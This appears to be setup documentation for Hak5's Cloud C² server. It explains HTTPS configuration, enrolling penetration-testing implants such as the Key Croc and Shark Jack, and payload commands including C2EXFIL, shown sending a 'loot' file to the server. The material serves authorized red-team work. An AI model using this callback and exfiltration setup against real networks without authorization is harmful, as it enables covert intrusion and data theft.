Let's Encrypt SSL configuration and device enrollment
Generally
- 1.Add an A record for your domain to your VPS IP address
- 2.Add the
-httpsparameter to the Cloud C² binary and set the -hostname flag to the fully qualified domain name.
For example:
sudo ./c2_3.2.0_amd64_linux -hostname example.com -https
remember to specify the right architecture and version
From version 3.0.0 onward all, Cloud C² editions (Community, Edition, Teams) use the same binary. Filenames for Cloud C² will differ from example — however all parameters remain the same.
Depending on which device you're using, this file will go in a different place.
- WiFi Pineapple – put
device.configin/etc/ - LAN Turtle – put
device.configin/etc/ - Packet Squirrel – put
device.configin/etc/ - Signal Owl – put
device.configin/etc/and useC2CONNECTin your payload - Shark Jack – put
device.configin/etc/and useC2CONNECTin your payload - Screen Crab – put
device.configon the root of the SD card - Key Croc – put
device.configon the root of the KeyCroc disk from arming mode
Generally, once the device is online it'll connect back to Cloud C² and you'll be able to interact with it from the dashboard. The exception to this is the Shark Jack and Signal Owl, which require the command
C2CONNECT in the payload to initialize the connection. Likewise, run the
C2DISCONNECT command to cut the connection. This is by design so that you aren't inadvertently connecting to your Cloud C² instance from every Shark Jack payload you run, as an example.Many devices support the
C2NOTIFY and C2EXFIL commands to send notifications and exfiltrate loot. The C2EXFIL command must be run for each file uploaded to the Cloud C² server. When exfiltrating text files, you'll want to add the
STRING option in order to make it viewable from the dashboard. For example, C2EXFIL STRING /root/loot/file.txt MyPayloadName. The payload name is optional, but helpful when multiple payloads run.